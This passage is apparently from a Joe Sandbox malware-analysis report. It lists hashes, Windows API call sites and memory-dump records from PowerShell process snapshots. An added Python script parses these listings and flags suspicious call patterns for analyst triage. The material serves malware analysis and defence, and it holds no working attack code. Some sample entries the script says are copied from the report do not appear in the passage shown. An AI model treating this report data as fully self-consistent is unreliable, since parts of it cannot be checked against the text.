                                            • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                            • Instruction Fuzzy Hash: 9BD05EB34019209AE3226704DC05E9F73ACEF11300B458466F841A21A5E3786D908AFD
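The per-function "APIs" listings above (one "• API.MODULE(args), ref: ADDR" line per call site, a "Strings" block of cross-referenced literals, and the "Similarity" fields) are what an analyst actually reads when triaging a report like this. The following is an added example, not Joe Sandbox code: a small parser that turns those lines into records and then flags functions whose call set matches a watch-list. The three sample entries embedded in it are copied from the listing on this page (argument lists shortened in places); the WATCH sets are my own illustrative choice, not anything the report defines.

```python
"""Parse the per-function 'APIs' listings of a Joe Sandbox function report
into structured records, then flag call sequences worth a second look.

Added example for this page, not Joe Sandbox code. The layout it assumes
(an 'APIs' heading, optional 'Strings' heading, then 'Similarity' bullet
fields) mirrors the listing above; the watch-list is my own choice.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# '• RegOpenKeyExW.ADVAPI32(?,?,00000000,...), ref: 00405D10'
# '• wsprintfW.USER32 ref: 00404927'                      (no argument list)
# '• Part of subcall function 00405D60: wsprintfW.USER32 ref: 00405D6D'
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
# '• C:\Users\user\AppData\Local\Temp\, xrefs: 00405864'
STRING_RE = re.compile(r"^\s*•\s*(?P<s>.*?),\s*xrefs:\s*(?P<ref>[0-9A-F]{8})\s*$")
# '• API String ID: 3677997916-3756222843'   (fields under 'Similarity')
FIELD_RE = re.compile(r"^\s*•\s*(?P<k>[A-Za-z ]+?):\s*(?P<v>.*?)\s*$")

HEADINGS = {"APIs", "Strings", "Memory Dump Source",
            "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class Call:
    api: str
    module: str
    args: list[str]
    ref: str                       # call-site address
    subcall_of: str | None = None  # set for 'Part of subcall function X' lines


@dataclass
class FunctionEntry:
    calls: list[Call] = field(default_factory=list)
    strings: dict[str, str] = field(default_factory=dict)  # literal -> xref
    fields: dict[str, str] = field(default_factory=dict)   # Similarity block

    def api_names(self) -> list[str]:
        return [c.api for c in self.calls]


def parse_report(text: str) -> list[FunctionEntry]:
    """One FunctionEntry per 'APIs' heading; the other headings switch section."""
    entries: list[FunctionEntry] = []
    cur: FunctionEntry | None = None
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line in HEADINGS:
            if line == "APIs":
                cur = FunctionEntry()
                entries.append(cur)
            section = line
            continue
        if cur is None or not line:
            continue
        if section == "APIs" and (m := CALL_RE.match(line)):
            # Splitting on ',' is fine for the report's argument lists, which
            # never contain a comma inside a single argument.
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(Call(m["api"], m["module"], args, m["ref"], m["sub"]))
        elif section == "Strings" and (m := STRING_RE.match(line)):
            cur.strings[m["s"]] = m["ref"]
        elif section == "Similarity" and (m := FIELD_RE.match(line)):
            cur.fields[m["k"]] = m["v"]
    return entries


# Call sets that deserve a look in an installer/unpacker stub (my own choice).
WATCH = {
    "registry read": {"RegOpenKeyExW", "RegQueryValueExW"},
    "version probe": {"GetFileVersionInfoW", "VerQueryValueW"},
    "temp-path build": {"lstrcatW", "CharPrevW"},
}


def triage(entries: list[FunctionEntry]) -> list[tuple[str, str, list[str]]]:
    """(label, first call-site ref, xref'd strings) for every entry hitting WATCH."""
    hits = []
    for e in entries:
        present = set(e.api_names())
        for label, needed in WATCH.items():
            if e.calls and needed <= present:
                hits.append((label, e.calls[0].ref, sorted(e.strings)))
    return hits


# Three entries copied from the listing on this page, trimmed to the lines the
# parser reads (some argument lists shortened).
SAMPLE = r"""
APIs
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Execute: ,?,00405F59,80000002,Software\Microsoft\Windows\CurrentVersion,?,Execute: ,?), ref: 00405D10
• RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00405F59,80000002,Software\Microsoft\Windows\CurrentVersion,?,Execute: ,?), ref: 00405D31
• RegCloseKey.ADVAPI32(?,?,00405F59,80000002,Software\Microsoft\Windows\CurrentVersion,?,Execute: ,?), ref: 00405D54
Memory Dump Source
• Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CloseOpenQueryValue
• String ID: Execute:
• API String ID: 3677997916-3756222843
APIs
• GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
• GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
• GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
• VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
  • Part of subcall function 00405D60: wsprintfW.USER32 ref: 00405D6D
APIs
• lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004031E9), ref: 0040586A
• CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004031E9), ref: 00405874
• lstrcatW.KERNEL32(?,00409014), ref: 00405886
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 00405864
"""

if __name__ == "__main__":
    for label, ref, strings in triage(parse_report(SAMPLE)):
        print(f"{ref}  {label:16s}  {strings}")
```

Run against a whole saved report, the `ref` of each hit is the address to jump to in the disassembly, and `fields["API String ID"]` gives the pair that Joe Sandbox uses for its own similarity matching, so hits can be compared across samples without re-parsing the call lines.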
                                            APIs
                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405C24,00000000,[Rename],00000000,00000000,00000000), ref: 004059FA
                                            • lstrcmpiA.KERNEL32(00405C24,00000000), ref: 00405A12
                                            • CharNextA.USER32(00405C24,?,00000000,00405C24,00000000,[Rename],00000000,00000000,00000000), ref: 00405A23
                                            • lstrlenA.KERNEL32(00405C24,?,00000000,00405C24,00000000,[Rename],00000000,00000000,00000000), ref: 00405A2C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: lstrlen$CharNextlstrcmpi
                                            • String ID:
                                            • API String ID: 190613189-0
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2171091198.0000000004570000.00000040.00000800.00020000.00000000.sdmp, Offset: 04570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4570000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1e3ffff0a8e207c3d99a77e25345e1dbce2461b50278d88e3e71c104d1c1a56d
                                            • Instruction ID: 0bcea34b959a45fb74ec5e992e8af2495d30a10e94a446ed85b05ddf3be0b66a
                                            • Opcode Fuzzy Hash: 1e3ffff0a8e207c3d99a77e25345e1dbce2461b50278d88e3e71c104d1c1a56d
                                            • Instruction Fuzzy Hash: 8D719E70A002198FCB14DF68E840A9EBBF2FF89354F14896AE419DB751DB71BD46CB90
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4bca658d62872aec884e3cade3c2798db06caccdf7b8bbadd35c920afe420290
                                            • Instruction ID: f769a5cc31e995c405609640b6a3a33b2968942cfcf3eeb4fee06ecb223e6e94
                                            • Opcode Fuzzy Hash: 4bca658d62872aec884e3cade3c2798db06caccdf7b8bbadd35c920afe420290
                                            • Instruction Fuzzy Hash: B1718DB8A00245EFCB54CF98C541A6EBBF2AF89310F15C669E905AF751CB71EC41CB91
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2171091198.0000000004570000.00000040.00000800.00020000.00000000.sdmp, Offset: 04570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4570000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a70e4421c6f4524248b01ec56884b026728a56e9170314851aed96cf317ead30
                                            • Instruction ID: fbf92d71ff03b0ed99b8e05da80edca2499c9fcde152bdf1a377767b2520642b
                                            • Opcode Fuzzy Hash: a70e4421c6f4524248b01ec56884b026728a56e9170314851aed96cf317ead30
                                            • Instruction Fuzzy Hash: 40714A70A006189FDB14DFA4E480BADBBF2FF88304F148429D416AB7A1DB75BD46DB81
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2f47bc4d9709e004243f5c5c922743f4959f0bc2d066491967fdde032284a77b
                                            • Instruction ID: 78b80282b61be79e3337252db9c9117574ff6305804991c344ce24aa66a97ea3
                                            • Opcode Fuzzy Hash: 2f47bc4d9709e004243f5c5c922743f4959f0bc2d066491967fdde032284a77b
                                            • Instruction Fuzzy Hash: 9A61BFB8A00286EFCB54CF98C540AADBBF2EF89314F15C25AE8156B751C7B1E841CB51
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2171091198.0000000004570000.00000040.00000800.00020000.00000000.sdmp, Offset: 04570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4570000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ce1a96a045c331e964196ac339d68bb9cd86ef020d1886d6f2da531f9b1b5f85
                                            • Instruction ID: adc6878b6f66767dc6cd34aba1548654119190c476c6c485927a1573f84a833e
                                            • Opcode Fuzzy Hash: ce1a96a045c331e964196ac339d68bb9cd86ef020d1886d6f2da531f9b1b5f85
                                            • Instruction Fuzzy Hash: 60417A34A002148FEB15DB64E854AAE7BB2FF8D754F184478E406EB7A0DB38BD41DB90
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f79b61ee2cb3557e0ce6c140a54f53ee6b517e86e651fffa1161789df719731b
                                            • Instruction ID: ef2078ac826de5e66d30e8ab2059c12394a6918e251b3587e4f077784e2d6e2a
                                            • Opcode Fuzzy Hash: f79b61ee2cb3557e0ce6c140a54f53ee6b517e86e651fffa1161789df719731b
                                            • Instruction Fuzzy Hash: A44114F1B14302AFCB608EE4C9046B97BE2AFC1348F5A86A6D9049F355D731E945C7A1
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2171091198.0000000004570000.00000040.00000800.00020000.00000000.sdmp, Offset: 04570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4570000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5e4cbbc0b93f68b33e40f62ff50d012d7add28897abc54c5ce287f4b7301aec6
                                            • Instruction ID: ebd60cbe86a0917ae51c5326c7b44a8db6b129c5f1eed54ed1906ab9620a7e9d
                                            • Opcode Fuzzy Hash: 5e4cbbc0b93f68b33e40f62ff50d012d7add28897abc54c5ce287f4b7301aec6
                                            • Instruction Fuzzy Hash: F7417C70A002189FDB14DFA9E8447EEBBF2BF89304F148469D405AB7A1DB74B945CF91
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2171091198.0000000004570000.00000040.00000800.00020000.00000000.sdmp, Offset: 04570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4570000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e2a0073cc9038832604d5a528f1647bd7eb4fe8a6ee2634b0439f9146032fb0a
                                            • Instruction ID: a58281060b47e56c9eae9de5d1c8449dfc237a4a1b5418bdbb612608c20219b5
                                            • Opcode Fuzzy Hash: e2a0073cc9038832604d5a528f1647bd7eb4fe8a6ee2634b0439f9146032fb0a
                                            • Instruction Fuzzy Hash: 8C4148B4A001099FCB1ACF58D494AAEFBB1FF48310F5585A9E815AB365C736FC51CBA0
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a70789b9a546f44c0c19223d5d014172fc66ba4f0e7badf59402ba500de66ecc
                                            • Instruction ID: 0991dfd158f65f427ec6cb67111ae44c5da56c917f60b890262a8c54681d7576
                                            • Opcode Fuzzy Hash: a70789b9a546f44c0c19223d5d014172fc66ba4f0e7badf59402ba500de66ecc
                                            • Instruction Fuzzy Hash: 03215AB130031EBBC7649AE9880173B76D69BD8719F14893EA64ACB2C4EE75D8409361
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2171091198.0000000004570000.00000040.00000800.00020000.00000000.sdmp, Offset: 04570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4570000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7ea17bcc9b883d5ce9d84ab01145a74eec6a753547fdf04442d39ad1dee5cfa5
                                            • Instruction ID: 83dd9cf4e81bfc5e435085c88548729c47de5d5390f3cfb74d3ec6bd55247dc7
                                            • Opcode Fuzzy Hash: 7ea17bcc9b883d5ce9d84ab01145a74eec6a753547fdf04442d39ad1dee5cfa5
                                            • Instruction Fuzzy Hash: F3312A30B011189FCB26DB64D8956EEB7B2BF89304F1084E9D409AB355CB35AE86DF81
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 88b084a11d84803cf5309e110f0540957d1265c469cd3ad1303fff66107765e9
                                            • Instruction ID: 9eca81ec2a9e4ba5b6fc72c109aa289c5cafdc93a8f571baca553dfd23dfe216
                                            • Opcode Fuzzy Hash: 88b084a11d84803cf5309e110f0540957d1265c469cd3ad1303fff66107765e9
                                            • Instruction Fuzzy Hash: 822139F0704342BFC7514EB44D1177E7FE1ABC5300F48456AE905DB292EB3A9A14C3A2
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 52d418c24dfb63800dd0e313998fc8a2be46636833757513d7bdc07d634a584e
                                            • Instruction ID: 5c4987e2434bda4595152e13abca8aa539a55e80c8db100df6350a5b17d4da20
                                            • Opcode Fuzzy Hash: 52d418c24dfb63800dd0e313998fc8a2be46636833757513d7bdc07d634a584e
                                            • Instruction Fuzzy Hash: EC218BF0704343ABCB604EA089013BDBFD2AFC2354F584669E5419F281DB369961D391
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ce46d71f85750b00fc61f0a7e65661dec99db614d0456e0b2ba2b6fe205cdea2
                                            • Instruction ID: 95c299ae3be8723f5f421517757e0323597b560895d0a9301cacfb887a3fe41a
                                            • Opcode Fuzzy Hash: ce46d71f85750b00fc61f0a7e65661dec99db614d0456e0b2ba2b6fe205cdea2
                                            • Instruction Fuzzy Hash: AD21BEF170438E7BC7644AB588007363BD65FA5704F18892EA645CB2C6DA78D940D361
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9ed3e6ef5f00a85abeb25bd39b1b5496c742dc623409ccb166af973849dba48f
                                            • Instruction ID: b13bdee5fba9b5d430a484870c4e6aed1739ec025efc4e2d40bb97ec24dcdd8a
                                            • Opcode Fuzzy Hash: 9ed3e6ef5f00a85abeb25bd39b1b5496c742dc623409ccb166af973849dba48f
                                            • Instruction Fuzzy Hash: 81218BF5304302BFC7600EB049417BDBBD2AFC1345F988569E6454F282CB36DA65C3A1
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2171091198.0000000004570000.00000040.00000800.00020000.00000000.sdmp, Offset: 04570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4570000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 60a5eece63ab67d8a56493dd7ca2240e6b0ab3843f59a47cfe2161f47ccfb8da
                                            • Instruction ID: a90f2d9e2ff54a0abc40d2b31ef2811adc826abb9968541c00b9193f44207863
                                            • Opcode Fuzzy Hash: 60a5eece63ab67d8a56493dd7ca2240e6b0ab3843f59a47cfe2161f47ccfb8da
                                            • Instruction Fuzzy Hash: FA211AB4A006199FCB00DF58D4809AAFBB5FF49310B158596E809EB352C731FD41CBA1
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c4227c794c4b5ee48baa6d7215f7fe68e50ab73246a3814e2ba6d0d7c43498f8
                                            • Instruction ID: 500d8e9022dc83f1e8055b59416ccd35d472cf2901be971c13f8c99f6f44b2ff
                                            • Opcode Fuzzy Hash: c4227c794c4b5ee48baa6d7215f7fe68e50ab73246a3814e2ba6d0d7c43498f8
                                            • Instruction Fuzzy Hash: 730147B631031EABCBA45AEAD40027ABBD5DBC5223F14C43EE859CB600EA32C845C360
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6eaf82c389cfa2160d53d5dbc0a9cc261d9f77c77bcafe436c842d63c71d3c9b
                                            • Instruction ID: 197065644335616919e7db57d86c727136717fddd7a9f7b8aab5ed9e302c2f87
                                            • Opcode Fuzzy Hash: 6eaf82c389cfa2160d53d5dbc0a9cc261d9f77c77bcafe436c842d63c71d3c9b
                                            • Instruction Fuzzy Hash: DBB012751051804FC201CB10C850400BB209F92208318C0CA94048B253CB23DE03C700
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$wl$wl$wl$wl
                                            • API String ID: 0-4001172130
                                            • Opcode ID: 805c2df0cf1f9b23850f4009a7114f5713e99b11b7d92e3570aba60ab313b80e
                                            • Instruction ID: e49c612b30f3a6971fd4e60c7c16cbba4a15d44aa8cc6cf3c466f2c9112a4bca
                                            • Opcode Fuzzy Hash: 805c2df0cf1f9b23850f4009a7114f5713e99b11b7d92e3570aba60ab313b80e
                                            • Instruction Fuzzy Hash: DDF14BB1704316AFCB668BA888016AABBF1AFC6311F18C56AD905CF391DF31DD45C7A1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                            • API String ID: 0-2779274079
                                            • Opcode ID: df6b4031da26942525c00bac8416b514f5a1000ce08d8eba4b531efd1af4af74
                                            • Instruction ID: ce53375b17f85919c89ffa806d68706f340369bd1df988c1534289214613e2db
                                            • Opcode Fuzzy Hash: df6b4031da26942525c00bac8416b514f5a1000ce08d8eba4b531efd1af4af74
                                            • Instruction Fuzzy Hash: E0C115B1B0420AFFCF548FA8C4046AE7BE1EF86711F14C6AAD8158FA49DB35D845C791
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                            • API String ID: 0-3466928173
                                            • Opcode ID: f42f0512461877d85a05640c506bd781c2898a5240cc4859e31dbaf8db941754
                                            • Instruction ID: 7d1f58da50dedecb4ec0ad8beff0ac25ff265a1a7cdd6cdee566fa58aef25954
                                            • Opcode Fuzzy Hash: f42f0512461877d85a05640c506bd781c2898a5240cc4859e31dbaf8db941754
                                            • Instruction Fuzzy Hash: 62D148F0B14346AFCB658BB8881076E7BE2AFC5211F14C5BAD545CF292DE31C945C7A2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$TQcq$TQcq$tP^q$$^q$$^q$$^q
                                            • API String ID: 0-2461640029
                                            • Opcode ID: 1bf9c48bc9c6d7dbbbdcf06f9bb244fe30a02ac638e9e21b77966deba07db38f
                                            • Instruction ID: 0f9ffaa7a30116f746f9864be43f85ca3ee6f4e8b25fe3bce09aa14435afbafd
                                            • Opcode Fuzzy Hash: 1bf9c48bc9c6d7dbbbdcf06f9bb244fe30a02ac638e9e21b77966deba07db38f
                                            • Instruction Fuzzy Hash: A35132B1A00206FFDB64CEA4C50A7AA7BF1BF41711F5486AAE8108B291C3B5DC44CBA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$d%dq$d%dq$d%dq$tP^q$$^q
                                            • API String ID: 0-2098638132
                                            • Opcode ID: bee7d513837f6e7a6b25b879fe254fe28e1b1c6d53de6e0f6d74279110eb5378
                                            • Instruction ID: 70592d8039efcff48c3ed368efdf9bfc30efb02dfcffc782bab5338727028352
                                            • Opcode Fuzzy Hash: bee7d513837f6e7a6b25b879fe254fe28e1b1c6d53de6e0f6d74279110eb5378
                                            • Instruction Fuzzy Hash: 415105F0714206EFCB28CF94C540AAABBF2AF95354F188696E8119F799C731DD44C7A1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q
                                            • API String ID: 0-1041444323
                                            • Opcode ID: 50ffa95f563c579bead7def3cfa01211533529cf79388c6af9e953431f492bcb
                                            • Instruction ID: 9b4c6e731d373a08c23363984fd295875ac8448f6af9ba4cabe992bae6cb4ce7
                                            • Opcode Fuzzy Hash: 50ffa95f563c579bead7def3cfa01211533529cf79388c6af9e953431f492bcb
                                            • Instruction Fuzzy Hash: AC213DB1F0835F6FC72A16A8142027A5FE65FC2651F39469BD445DF346EF218C498393
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$tP^q$$^q$$^q$$^q
                                            • API String ID: 0-3997570045
                                            • Opcode ID: 7d231225d9ddf7f95130fa8ccfd0fd8386ff2c1cf6b3d168d65ba5b1100f9ecd
                                            • Instruction ID: 501dd16d6a5270d1c59738ce56a7a7c9121ce555497bb6e498e0d9ddfe7eef32
                                            • Opcode Fuzzy Hash: 7d231225d9ddf7f95130fa8ccfd0fd8386ff2c1cf6b3d168d65ba5b1100f9ecd
                                            • Instruction Fuzzy Hash: CD6114F060020BFFDB64CE94C946BBA7BE1AF45705F588665E8205F291C731ED81CBA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$tP^q$$^q$$^q$$^q
                                            • API String ID: 0-3997570045
                                            • Opcode ID: de868c2378d3b563987c015c1aad5b4738aa82b0a2632d0f425b5290b577dd1d
                                            • Instruction ID: 2b2066e3f053da5d194c972f047070ec91bdf9972a408fa39761cd1f18f469a6
                                            • Opcode Fuzzy Hash: de868c2378d3b563987c015c1aad5b4738aa82b0a2632d0f425b5290b577dd1d
                                            • Instruction Fuzzy Hash: AE61F3F060020BFFDB68CE94C5467BAB7E1AF45705F588665E8205F291C731ED81CBA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                            • API String ID: 0-3272787073
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$d%dq$d%dq$d%dq$tP^q
                                            • API String ID: 0-3846404929
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $^q$$^q$$^q$wl$wl
                                            • API String ID: 0-3213030559
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (o^q$(o^q$(o^q$(o^q
                                            • API String ID: 0-1978863864
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: XRcq$XRcq$tP^q$$^q
                                            • API String ID: 0-3596674671
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $^q$$^q$$^q$$^q
                                            • API String ID: 0-2125118731
                                            Strings
